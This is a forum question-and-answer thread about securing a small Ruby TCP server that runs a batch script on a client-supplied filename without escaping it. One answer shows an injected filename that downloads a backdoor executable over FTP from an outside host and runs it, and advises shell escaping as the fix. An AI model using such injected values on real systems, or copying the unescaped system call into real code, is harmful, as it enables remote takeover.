Should I Take Security Measures for a Small, Single-Service Server?
I have some experience with programming, but I have very little experience when it comes to the security of programs. I've written a single-service server in Ruby which runs on a Windows XP computer to be used by a Linux computer in the same lab. The lab network is also behind a firewall, so there might not be a problem there, but I really have no idea. Below is the code for the server. All it does is take a .raw file, runs msconvert.exe to convert it into an mzML file, and then sends back the mzML file.
require 'socket'
server = TCPServer.open(2000)
loop {
client = server.accept
filename = client.gets.chomp
puts "Reading contents of #{filename}.raw"
raw_data = client.gets("\r\r\n\n").chomp("\r\r\n\n")
File.open(filename + ".raw", 'wb') {|out| out.print raw_data}
puts "Converting #{filename}"
#It's lame to have a sc开发者_开发知识库ript run a script, but it's the only way to get this to work.
system "scriptit.bat " + filename + ".raw"
puts "Sending contents of #{filename}.mzML"
client.print IO.read(filename + ".mzML")
client.print "\r\r\n\n"
puts "Done"
client.close # Disconnect from the client
}
Should I do something to make this more secure, or do I not need to worry about it?
If an attacker supples a filename
of || ftp ftp://host/backdoor.exe || backdoor.exe ||
he will be able to infect your server.
In order to patch this server you need to use Escape.shell_command().
Well, if your Windows server is only used by your lab computers, I would say it is sufficient if you configure the firewall so that nobody can access the server from the outside.
If the system is exposed to anything public (the internet, etc.) then security is very important. Some people really enjoy the challenge of breaking systems.
精彩评论